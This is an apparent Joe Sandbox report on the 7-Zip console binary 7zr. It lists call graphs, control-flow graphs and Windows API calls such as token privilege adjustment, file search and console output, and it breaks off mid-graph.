76629->76396 76630->76396 76631->76386 76632->76391 76633->76407 76634->76407 76635->76397 76636->76417 76637->76414 76638->76416 76639->76388 76640->76422 76641->76425 76642->76427 76643->76429 76644->76431 76645->76433 76646->76435 76658 21fb10 76647->76658 76649 193d70 GetCurrentProcess 76659 193e04 76649->76659 76651 193d8d OpenProcessToken 76652 193d9e LookupPrivilegeValueW 76651->76652 76653 193de3 76651->76653 76652->76653 76654 193dc0 AdjustTokenPrivileges 76652->76654 76655 193e04 CloseHandle 76653->76655 76654->76653 76656 193dd5 GetLastError 76654->76656 76657 193def 76655->76657 76656->76653 76657->76616 76658->76649 76660 193e0d 76659->76660 76661 193e11 CloseHandle 76659->76661 76660->76651 76662 193e21 76661->76662 76662->76651 76732 1a070d __EH_prolog 76663->76732 76664 1a0b40 76664->76617 76665 1a0e1d 76771 1a0416 18 API calls 2 library calls 76665->76771 76667 1a0ea6 76773 1cec78 free ctype 76667->76773 76668 1a0d11 76765 187496 7 API calls 2 library calls 76668->76765 76669 1a0c13 76762 181e40 free 76669->76762 76670 1a0c83 76670->76665 76670->76668 76672 182da9 2 API calls 76672->76732 76676 182da9 2 API calls 76715 1a0ab5 76676->76715 76677 1a0e47 76677->76667 76772 1a117d 68 API calls 2 library calls 76677->76772 76678 1a0de0 76767 1b2db9 free ctype 76678->76767 76679 182f1c 2 API calls 76709 1a0d29 76679->76709 76681 1a0df8 76769 181e40 free 76681->76769 76682 182e04 2 API calls 76682->76732 76684 182e04 2 API calls 76684->76715 76688 1a0e02 76770 1b2db9 free ctype 76688->76770 76689 182e04 2 API calls 76689->76709 76691 182fec 3 API calls 76691->76732 76695 182fec 3 API calls 76695->76709 76696 182fec 3 API calls 76696->76715 76700 1a050b 44 API calls 76700->76715 76702 1a0b26 76754 181e40 free 76702->76754 76703 1a0df3 76768 181e40 free 76703->76768 76706 181e40 free ctype 76706->76709 76708 1c04d2 malloc _CxxThrowException free _CxxThrowException memcpy 76708->76732 76709->76678 76709->76679 76709->76681 76709->76689 76709->76695 76709->76703 76709->76706 76766 1a117d 68 API calls 2 library calls 76709->76766 76710 1a0b30 76755 181e40 free 76710->76755 76711 1a0c79 76764 181e40 free 76711->76764 76712 181e40 free ctype 76712->76715 76715->76669 76715->76676 76715->76684 76715->76696 76715->76700 76715->76711 76715->76712 76753 182f4a malloc _CxxThrowException free ctype 76715->76753 76758 181089 malloc _CxxThrowException free _CxxThrowException 76715->76758 76759 1a13eb 5 API calls 2 library calls 76715->76759 76760 1a0ef4 68 API calls 2 library calls 76715->76760 76761 1b2db9 free ctype 76715->76761 76763 1a0021 GetLastError 76715->76763 76716 1a0b38 76756 181e40 free 76716->76756 76720 1b2db9 free ctype 76720->76732 76727 181524 malloc _CxxThrowException 76727->76732 76728 1a0b48 76757 1b2db9 free ctype 76728->76757 76730 181e40 free ctype 76730->76732 76732->76664 76732->76670 76732->76672 76732->76682 76732->76691 76732->76702 76732->76708 76732->76715 76732->76720 76732->76727 76732->76728 76732->76730 76736 182f4a malloc _CxxThrowException free ctype 76732->76736 76737 181089 malloc _CxxThrowException free _CxxThrowException 76732->76737 76738 1a13eb 5 API calls 2 library calls 76732->76738 76739 1a050b 76732->76739 76744 1a0021 GetLastError 76732->76744 76745 1849bd 9 API calls 2 library calls 76732->76745 76746 1a0306 12 API calls 76732->76746 76747 19ff00 5 API calls 2 library calls 76732->76747 76748 1a057d 16 API calls 2 library calls 76732->76748 76749 1a0f8e 24 API calls 2 library calls 76732->76749 76750 18472e CharUpperW 76732->76750 76751 198984 malloc _CxxThrowException free _CxxThrowException memcpy 76732->76751 76752 1a0ef4 68 API calls 2 library calls 76732->76752 76733->76617 76734->76620 76735->76625 76736->76732 76737->76732 76738->76732 76740 186c72 44 API calls 76739->76740 76743 1a051e 76740->76743 76741 1a0575 76741->76732 76742 182f88 3 API calls 76742->76741 76743->76741 76743->76742 76744->76732 76745->76732 76746->76732 76747->76732 76748->76732 76749->76732 76750->76732 76751->76732 76752->76732 76753->76715 76754->76710 76755->76716 76756->76664 76757->76702 76758->76715 76759->76715 76760->76715 76761->76715 76762->76664 76763->76715 76764->76670 76765->76709 76766->76709 76767->76664 76768->76681 76769->76688 76770->76664 76771->76677 76772->76677 76773->76664 76775 1b5689 76774->76775 76776 1b56b1 76774->76776 76778 1b5593 6 API calls 76775->76778 76792 1b5593 76776->76792 76780 1b56a5 76778->76780 76781 1828a1 5 API calls 76780->76781 76781->76776 76784 1b570e fputs 76790 181fa0 fputc 76784->76790 76786 1b56ef 76787 1b5593 6 API calls 76786->76787 76788 1b5701 76787->76788 76789 1b5711 6 API calls 76788->76789 76789->76784 76790->76445 76791->76439 76793 1b55ad 76792->76793 76794 1828a1 5 API calls 76793->76794 76795 1b55b8 76794->76795 76796 18286d 5 API calls 76795->76796 76797 1b55bf 76796->76797 76798 1828a1 5 API calls 76797->76798 76799 1b55c7 76798->76799 76800 1b5711 76799->76800 76801 1b56e0 76800->76801 76802 1b5721 76800->76802 76801->76784 76806 182881 malloc _CxxThrowException free memcpy _CxxThrowException 76801->76806 76803 1828a1 5 API calls 76802->76803 76804 1b572b 76803->76804 76807 1b55cd 6 API calls 76804->76807 76806->76786 76807->76801 76808->76452 76809->76456 76810->76458 76811->76460 76812->76462 77426 187b20 77429 187ab2 77426->77429 77430 187ac5 77429->77430 77431 18759a 12 API calls 77430->77431 77432 187ade 77431->77432 77433 187aeb SetFileTime 77432->77433 77434 187b03 77432->77434 77433->77434 77437 187919 77434->77437 77438 187aac 77437->77438 77439 18793c 77437->77439 77439->77438 77440 187945 DeviceIoControl 77439->77440 77441 187969 77440->77441 77442 1879e6 77440->77442 77441->77442 77449 1879a7 77441->77449 77443 1879ef DeviceIoControl 77442->77443 77446 187a14 77442->77446 77444 187a22 DeviceIoControl 77443->77444 77443->77446 77445 187a44 DeviceIoControl 77444->77445 77444->77446 77445->77446 77446->77438 77454 18780d 8 API calls ctype 77446->77454 77448 187aa5 77450 1877de 5 API calls 77448->77450 77453 189252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 77449->77453 77450->77438 77452 1879d0 77452->77442 77453->77452 77454->77448 77455 1cbf67 77456 1cbf74 77455->77456 77460 1cbf85 77455->77460 77456->77460 77461 1cbf8c 77456->77461 77462 1cbf96 __EH_prolog 77461->77462 77478 1cd144 77462->77478 77466 1cbfd0 77485 181e40 free 77466->77485 77468 1cbfdb 77486 181e40 free 77468->77486 77470 1cbfe6 77487 1cc072 free ctype 77470->77487 77472 1cbff4 77488 19aafa free VariantClear ctype 77472->77488 77474 1cc023 77489 1a73d2 free VariantClear __EH_prolog ctype 77474->77489 77476 1cbf7f 77477 181e40 free 77476->77477 77477->77460 77480 1cd14e __EH_prolog 77478->77480 77479 1cd1b7 free 77481 1cd180 77479->77481 77480->77479 77490 1c8e04 memset 77481->77490 77483 1cbfc5 77484 181e40 free 77483->77484 77484->77466 77485->77468 77486->77470 77487->77472 77488->77474 77489->77476 77490->77483 77491 1bc2e6 77492 1bc52f 77491->77492 77495 1b544f SetConsoleCtrlHandler 77492->77495 77494 1bc53b 77495->77494

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1073 189313-189338 GetCurrentProcess OpenProcessToken 1074 18933a-18934a LookupPrivilegeValueW 1073->1074 1075 189390 1073->1075 1076 18934c-189370 AdjustTokenPrivileges 1074->1076 1077 189382 1074->1077 1078 189393-189398 1075->1078 1076->1077 1079 189372-189380 GetLastError 1076->1079 1080 189385-18938e CloseHandle 1077->1080 1079->1080 1080->1078
                          APIs
                          • GetCurrentProcess.KERNEL32(00000020,00191EC5,?,7597AB50,?,?,?,?,00191EC5,00191CEF), ref: 00189329
                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00191EC5,00191CEF), ref: 00189330
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00189342
                          • AdjustTokenPrivileges.KERNELBASE(00191EC5,00000000,?,00000000,00000000,00000000), ref: 00189368
                          • GetLastError.KERNEL32 ref: 00189372
                          • CloseHandle.KERNELBASE(00191EC5,?,?,?,?,00191EC5,00191CEF), ref: 00189388
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                          • String ID: SeRestorePrivilege
                          • API String ID: 3398352648-1684392131
                          • Opcode ID: c84c532d451158b433ad4b0e6d5e594770f8ede8f9dc6750426a8f7e9c3e0bf0
                          • Instruction ID: 27be162858712f7f425bf4d2cb3b812f7e40492cfcaa849bacc5dbc2ca727b1b
                          • Opcode Fuzzy Hash: c84c532d451158b433ad4b0e6d5e594770f8ede8f9dc6750426a8f7e9c3e0bf0
                          • Instruction Fuzzy Hash: C1016D76945218BBCB206BF1AC4DBEE7F7CAF06340F181164A942E2190D7758709DBA0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1081 193d66-193d9c call 21fb10 GetCurrentProcess call 193e04 OpenProcessToken 1086 193d9e-193dbe LookupPrivilegeValueW 1081->1086 1087 193de3-193dfe call 193e04 1081->1087 1086->1087 1088 193dc0-193dd3 AdjustTokenPrivileges 1086->1088 1088->1087 1090 193dd5-193de1 GetLastError 1088->1090 1090->1087
                          APIs
                          • __EH_prolog.LIBCMT ref: 00193D6B
                          • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193D7D
                          • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193D94
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00193DB6
                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193DCB
                          • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193DD5
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                          • String ID: SeSecurityPrivilege
                          • API String ID: 3475889169-2333288578
                          • Opcode ID: 34ecc5bb25bc718c3c79559af6a893085c5f2f7f97dbfc54020a909929249fcc
                          • Instruction ID: c8aef4063b1a804524120d58c767a78c8e6ccb8bbfcb8ce9e9619782c7a2970e
                          • Opcode Fuzzy Hash: 34ecc5bb25bc718c3c79559af6a893085c5f2f7f97dbfc54020a909929249fcc
                          • Instruction Fuzzy Hash: CC113CB1940119AFDF20AFE4EC99AFEFBBCFF04344F500529E422E2190D7709B098A60
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C81F1
                            • Part of subcall function 001CF749: _CxxThrowException.MSVCRT(?,00234A58), ref: 001CF792
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionH_prologThrow
                          • String ID:
                          • API String ID: 461045715-3916222277
                          • Opcode ID: d74a48facf5f13b03f6e6ba7a3fc41c006009eae7c4a055b2423bb36d3cd6b19
                          • Instruction ID: 8aeea1961236055a97d69cc88e788ddeb562116f9d446e1308a057856e7bd74b
                          • Opcode Fuzzy Hash: d74a48facf5f13b03f6e6ba7a3fc41c006009eae7c4a055b2423bb36d3cd6b19
                          • Instruction Fuzzy Hash: 10926B71900259DFDB15DFA8C884FAEBBB1BF69304F24409DE805AB292CB74DE45CB61
                          APIs
                          • __EH_prolog.LIBCMT ref: 0018686D
                            • Part of subcall function 00186848: FindClose.KERNELBASE(00000000,?,00186880), ref: 00186853
                          • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 001868A5
                          • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 001868DE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: Find$FileFirst$CloseH_prolog
                          • String ID:
                          • API String ID: 3371352514-0
                          • Opcode ID: 1a0a1d88dd8b2db97165305ed8cf9b8b010c3363c6af3e2148342f5b991cfdb6
                          • Instruction ID: d6d3ff245e0079465af0babd053019cd50b0b361b02b26e0606b8c1742316469
                          • Opcode Fuzzy Hash: 1a0a1d88dd8b2db97165305ed8cf9b8b010c3363c6af3e2148342f5b991cfdb6
                          • Instruction Fuzzy Hash: BD119D31900209EBCB20FFA4D8969EDB7B9EF61324F204629E9A557191DB318F86DF40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 1ba013-1ba01a 1 1ba37a-1ba544 call 1c04d2 call 181524 call 1c04d2 call 181524 call 181e0c 0->1 2 1ba020-1ba02d call 191ac8 0->2 62 1ba551 1->62 63 1ba546-1ba54f call 1bb0fa 1->63 8 1ba22e-1ba235 2->8 9 1ba033-1ba03a 2->9 10 1ba23b-1ba24d call 1bb4f6 8->10 11 1ba367-1ba375 call 1bb55f 8->11 13 1ba03c-1ba042 9->13 14 1ba054-1ba089 call 1b92d3 9->14 29 1ba259-1ba2fb call 1a7ebb call 1827bb call 1826dd call 1a3d70 call 1bad99 call 1827bb 10->29 30 1ba24f-1ba253 10->30 28 1bac23-1bac2a 11->28 13->14 16 1ba044-1ba04f call 1830ea 13->16 26 1ba08b-1ba091 14->26 27 1ba099 14->27 16->14 26->27 33 1ba093-1ba097 26->33 34 1ba09d-1ba0de call 182fec call 1bb369 27->34 35 1bac3a-1bac66 call 1bb96d call 181e40 call 1a3247 28->35 36 1bac2c-1bac33 28->36 94 1ba2fd 29->94 95 1ba303-1ba362 call 1bb6ab call 1b2db9 call 181e40 * 2 call 1bbff8 29->95 30->29 33->34 58 1ba0ea-1ba0fa 34->58 59 1ba0e0-1ba0e4 34->59 68 1bac68-1bac6a 35->68 69 1bac6e-1bacb5 call 181e40 call 1811c2 call 1bbe0c call 1b2db9 35->69 36->35 40 1bac35 36->40 45 1bac35 call 1bb988 40->45 45->35 64 1ba10d 58->64 65 1ba0fc-1ba102 58->65 59->58 72 1ba553-1ba55c 62->72 63->72 67 1ba114-1ba19e call 182fec call 1a7ebb call 1bad99 64->67 65->64 66 1ba104-1ba10b 65->66 66->67 102 1ba1a2 call 1af8e0 67->102 68->69 77 1ba55e-1ba560 72->77 78 1ba564-1ba5c1 call 182fec call 1bb277 72->78 77->78 96 1ba5cd-1ba652 call 1bad06 call 1bbf3e call 193a29 call 182e04 call 1a4345 78->96 97 1ba5c3-1ba5c7 78->97 94->95 95->28 136 1ba676-1ba6c8 call 1a2096 96->136 137 1ba654-1ba671 call 1a375c call 1bb96d 96->137 97->96 107 1ba1a7-1ba1b1 102->107 111 1ba1b3-1ba1bb call 1bc7d7 107->111 112 1ba1c0-1ba1c9 107->112 111->112 117 1ba1cb 112->117 118 1ba1d1-1ba229 call 1bb6ab call 1b2db9 call 181e40 call 1bbfa4 call 1b940b 112->118 117->118 118->28 143 1ba6cd-1ba6d6 136->143 137->136 146 1ba6d8-1ba6dd call 1bc7d7 143->146 147 1ba6e2-1ba6e5 143->147 146->147 150 1ba72e-1ba73a 147->150 151 1ba6e7-1ba6ee 147->151 152 1ba79e-1ba7aa 150->152 153 1ba73c-1ba74a call 181fa0 150->153 154 1ba722-1ba725 151->154 155 1ba6f0-1ba71d call 181fa0 fputs call 181fa0 call 181fb3 call 181fa0 151->155 156 1ba7d9-1ba7e5 152->156 157 1ba7ac-1ba7b2 152->157 169 1ba74c-1ba753 153->169 170 1ba755-1ba799 fputs call 182201 call 181fa0 fputs call 182201 call 181fa0 153->170 154->150 158 1ba727 154->158 155->154 163 1ba818-1ba81a 156->163 164 1ba7e7-1ba7ed 156->164 157->156 161 1ba7b4-1ba7d4 fputs call 182201 call 181fa0 157->161 158->150 161->156 166 1ba899-1ba8a5 163->166 167 1ba81c-1ba82b 163->167 164->166 171 1ba7f3-1ba813 fputs call 182201 call 181fa0 164->171 179 1ba8e9-1ba8ed 166->179 180 1ba8a7-1ba8ad 166->180 174 1ba82d-1ba84c fputs call 182201 call 181fa0 167->174 175 1ba851-1ba85d 167->175 169->152 169->170 170->152 171->163 174->175 175->166 183 1ba85f-1ba872 call 181fa0 175->183 184 1ba8ef 179->184 185 1ba8f6-1ba8f8 179->185 180->184 189 1ba8af-1ba8c2 call 181fa0 180->189 183->166 209 1ba874-1ba894 fputs call 182201 call 181fa0 183->209 184->185 194 1baaaf-1baaeb call 1a43b3 call 181e40 call 1bc104 call 1bad82 185->194 195 1ba8fe-1ba90a 185->195 189->184 207 1ba8c4-1ba8e4 fputs call 182201 call 181fa0 189->207 246 1bac0b-1bac1e call 1b2db9 * 2 194->246 247 1baaf1-1baaf7 194->247 203 1baa73-1baa89 call 181fa0 195->203 204 1ba910-1ba91f 195->204 203->194 220 1baa8b-1baaaa fputs call 182201 call 181fa0 203->220 204->203 211 1ba925-1ba929 204->211 207->179 209->166 211->194 217 1ba92f-1ba93d 211->217 223 1ba96a-1ba971 217->223 224 1ba93f-1ba964 fputs call 182201 call 181fa0 217->224 220->194 225 1ba98f-1ba9a8 fputs call 182201 223->225 226 1ba973-1ba97a 223->226 224->223 240 1ba9ad-1ba9bd call 181fa0 225->240 226->225 232 1ba97c-1ba982 226->232 232->225 238 1ba984-1ba98d 232->238 238->225 244 1baa06-1baa1f fputs call 182201 238->244 240->244 252 1ba9bf-1baa01 fputs call 182201 call 181fa0 fputs call 182201 call 181fa0 240->252 251 1baa24-1baa29 call 181fa0 244->251 246->28 247->246 258 1baa2e-1baa4b fputs call 182201 251->258 252->244 262 1baa50-1baa5b call 181fa0 258->262 262->194 269 1baa5d-1baa71 call 181fa0 call 1b710e 262->269 269->194
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$ExceptionThrow
                          • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $`&$$p&$$N
                          • API String ID: 3665150552-950886213
                          • Opcode ID: c52578a100fc138cb331fac30f7c6ce5df39e2488007e9ffe06ed4b2f07e6e3c
                          • Instruction ID: fc769fd2c20ce044de66ee573dbe5a791a0d45220a5f62eb97f10083dc86f01c
                          • Opcode Fuzzy Hash: c52578a100fc138cb331fac30f7c6ce5df39e2488007e9ffe06ed4b2f07e6e3c
                          • Instruction Fuzzy Hash: C352AC31904258DFCF26EBA4C895BEDBBB5AF54304F14409AE44AA3291DB746F89CF11

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 274 1ba42c-1ba433 275 1ba449-1ba4df call 1b545d call 182e04 call 1a1858 call 181e40 274->275 276 1ba435-1ba444 fputs call 181fa0 274->276 286 1ba4ee-1ba4f1 275->286 287 1ba4e1-1ba4e9 call 1bc7d7 275->287 276->275 289 1ba50e-1ba520 call 1bc73e 286->289 290 1ba4f3-1ba4fa 286->290 287->286 295 1bac0b-1bac2a call 1b2db9 * 2 289->295 296 1ba526-1ba544 call 181e0c 289->296 290->289 291 1ba4fc-1ba509 call 1b57fb 290->291 291->289 306 1bac3a-1bac66 call 1bb96d call 181e40 call 1a3247 295->306 307 1bac2c-1bac33 295->307 304 1ba551 296->304 305 1ba546-1ba54f call 1bb0fa 296->305 309 1ba553-1ba55c 304->309 305->309 327 1bac68-1bac6a 306->327 328 1bac6e-1bacb5 call 181e40 call 1811c2 call 1bbe0c call 1b2db9 306->328 307->306 310 1bac35 call 1bb988 307->310 313 1ba55e-1ba560 309->313 314 1ba564-1ba5c1 call 182fec call 1bb277 309->314 310->306 313->314 325 1ba5cd-1ba652 call 1bad06 call 1bbf3e call 193a29 call 182e04 call 1a4345 314->325 326 1ba5c3-1ba5c7 314->326 348 1ba676-1ba6d6 call 1a2096 325->348 349 1ba654-1ba671 call 1a375c call 1bb96d 325->349 326->325 327->328 355 1ba6d8-1ba6dd call 1bc7d7 348->355 356 1ba6e2-1ba6e5 348->356 349->348 355->356 358 1ba72e-1ba73a 356->358 359 1ba6e7-1ba6ee 356->359 360 1ba79e-1ba7aa 358->360 361 1ba73c-1ba74a call 181fa0 358->361 362 1ba722-1ba725 359->362 363 1ba6f0-1ba71d call 181fa0 fputs call 181fa0 call 181fb3 call 181fa0 359->363 364 1ba7d9-1ba7e5 360->364 365 1ba7ac-1ba7b2 360->365 377 1ba74c-1ba753 361->377 378 1ba755-1ba799 fputs call 182201 call 181fa0 fputs call 182201 call 181fa0 361->378 362->358 366 1ba727 362->366 363->362 371 1ba818-1ba81a 364->371 372 1ba7e7-1ba7ed 364->372 365->364 369 1ba7b4-1ba7d4 fputs call 182201 call 181fa0 365->369 366->358 369->364 374 1ba899-1ba8a5 371->374 375 1ba81c-1ba82b 371->375 372->374 379 1ba7f3-1ba813 fputs call 182201 call 181fa0 372->379 387 1ba8e9-1ba8ed 374->387 388 1ba8a7-1ba8ad 374->388 382 1ba82d-1ba84c fputs call 182201 call 181fa0 375->382 383 1ba851-1ba85d 375->383 377->360 377->378 378->360 379->371 382->383 383->374 391 1ba85f-1ba872 call 181fa0 383->391 392 1ba8ef 387->392 393 1ba8f6-1ba8f8 387->393 388->392 397 1ba8af-1ba8c2 call 181fa0 388->397 391->374 417 1ba874-1ba894 fputs call 182201 call 181fa0 391->417 392->393 402 1baaaf-1baaeb call 1a43b3 call 181e40 call 1bc104 call 1bad82 393->402 403 1ba8fe-1ba90a 393->403 397->392 415 1ba8c4-1ba8e4 fputs call 182201 call 181fa0 397->415 402->295 454 1baaf1-1baaf7 402->454 411 1baa73-1baa89 call 181fa0 403->411 412 1ba910-1ba91f 403->412 411->402 428 1baa8b-1baaaa fputs call 182201 call 181fa0 411->428 412->411 419 1ba925-1ba929 412->419 415->387 417->374 419->402 425 1ba92f-1ba93d 419->425 431 1ba96a-1ba971 425->431 432 1ba93f-1ba964 fputs call 182201 call 181fa0 425->432 428->402 433 1ba98f-1ba9a8 fputs call 182201 431->433 434 1ba973-1ba97a 431->434 432->431 448 1ba9ad-1ba9bd call 181fa0 433->448 434->433 440 1ba97c-1ba982 434->440 440->433 446 1ba984-1ba98d 440->446 446->433 452 1baa06-1baa4b fputs call 182201 call 181fa0 fputs call 182201 446->452 448->452 458 1ba9bf-1baa01 fputs call 182201 call 181fa0 fputs call 182201 call 181fa0 448->458 466 1baa50-1baa5b call 181fa0 452->466 454->295 458->452 466->402 473 1baa5d-1baa71 call 181fa0 call 1b710e 466->473 473->402
                          APIs
                          • fputs.MSVCRT(Scanning the drive for archives:), ref: 001BA43E
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputcfputs
                          • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $`&$$p&$$!"$N
                          • API String ID: 269475090-4035768851
                          • Opcode ID: bf53135e0f7e1ffc4d4d3de91843216ab4bfde8f45b6164147d07e398aeabed1
                          • Instruction ID: 51a131c7b49df8b6d985369d444bc21f7db458438955e0f23f277b10118c273c
                          • Opcode Fuzzy Hash: bf53135e0f7e1ffc4d4d3de91843216ab4bfde8f45b6164147d07e398aeabed1
                          • Instruction Fuzzy Hash: 14229D31904258DFDF2AEBA4C895BEDFBB6AF54304F10409AE44A63291DB756F88CF11

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 478 1b993d-1b9950 call 1bb5b1 481 1b9963-1b997e call 191f33 478->481 482 1b9952-1b995e call 181fb3 478->482 486 1b998f-1b9998 481->486 487 1b9980-1b998a 481->487 482->481 488 1b999a-1b99a6 486->488 489 1b99a8 486->489 487->486 488->489 490 1b99ab-1b99b5 488->490 489->490 491 1b99b7-1b99cc GetStdHandle GetConsoleScreenBufferInfo 490->491 492 1b99d5-1b9a04 call 181e0c call 1bacb6 490->492 491->492 493 1b99ce-1b99d2 491->493 500 1b9a0c-1b9a24 call 1a7b48 492->500 501 1b9a06-1b9a08 492->501 493->492 503 1b9a29-1b9a48 call 1bb96d call 1a7018 call 191aa4 500->503 501->500 510 1b9a4a-1b9a4c 503->510 511 1b9a7c-1b9aa8 call 1addb5 503->511 513 1b9a4e-1b9a55 510->513 514 1b9a66-1b9a77 _CxxThrowException 510->514 517 1b9aaa-1b9abb _CxxThrowException 511->517 518 1b9ac0-1b9ade 511->518 513->514 516 1b9a57-1b9a64 call 191ac8 513->516 514->511 516->511 516->514 517->518 521 1b9b3a-1b9b55 518->521 522 1b9ae0-1b9b04 call 1a7dd7 518->522 525 1b9b5c-1b9ba4 call 181fa0 fputs call 181fa0 strlen * 2 521->525 526 1b9b57 521->526 529 1b9bfa-1b9c0b _CxxThrowException 522->529 530 1b9b0a-1b9b0e 522->530 539 1b9baa-1b9be4 fputs fputc 525->539 540 1b9e25-1b9e4d call 181fa0 fputs call 181fa0 525->540 526->525 533 1b9c10 529->533 530->529 532 1b9b14-1b9b38 call 1bc077 call 181e40 530->532 532->521 532->522 536 1b9c12-1b9c25 533->536 543 1b9c27-1b9c33 536->543 544 1b9be6-1b9bf0 536->544 539->543 539->544 556 1b9f0c-1b9f34 call 181fa0 fputs call 181fa0 540->556 557 1b9e53 540->557 551 1b9c81-1b9cb1 call 1bb67d call 182e04 543->551 552 1b9c35-1b9c3d 543->552 544->533 547 1b9bf2-1b9bf8 544->547 547->536 591 1b9cb3-1b9cb7 551->591 592 1b9d10-1b9d28 call 1bb67d 551->592 554 1b9c6b-1b9c80 call 1821d8 552->554 555 1b9c3f-1b9c4a 552->555 554->551 560 1b9c4c-1b9c52 555->560 561 1b9c54 555->561 579 1b9f3a 556->579 580 1bac23-1bac2a 556->580 558 1b9e5a-1b9e6f call 1bb650 557->558 572 1b9e7b-1b9e7e call 1821d8 558->572 573 1b9e71-1b9e79 558->573 